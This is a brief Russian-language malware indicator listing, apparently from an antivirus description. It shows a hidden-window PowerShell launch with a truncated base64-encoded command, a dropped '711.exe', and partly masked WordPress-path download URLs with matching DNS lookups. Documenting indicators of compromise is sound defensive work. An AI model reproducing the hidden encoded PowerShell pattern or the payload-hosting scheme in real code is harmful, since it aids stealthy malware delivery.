Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABTAHQAcAB5AHUAZwBrAGgAdQBjAG8AdQBsAD0AJwBDAHoAZABiAGwAZQB4AHgAJwA7ACQASgBrAHQAcQB1AGkAeABqAGkAZQB0AG8AIAA9ACAAJwA3ADEAMQAnADsAJABEAHAAYQBiAGsAaABoAHMAZgB6AHY...
- %HOMEPATH%\711.exe
- %HOMEPATH%\711.exe
- %HOMEPATH%\711.exe
- http://www.co##eys.com/wp-content/r7/
- http://ta##nah.com/wp-content/y455/
- http://ko###laf.com/wp-content/pjk0l43/
- http://5l###foods.com/database/3yiwuo3886/
- DNS ASK co##eys.com
- DNS ASK ta##nah.com
- DNS ASK ta####eative.com
- DNS ASK ko###laf.com
- DNS ASK 5l###foods.com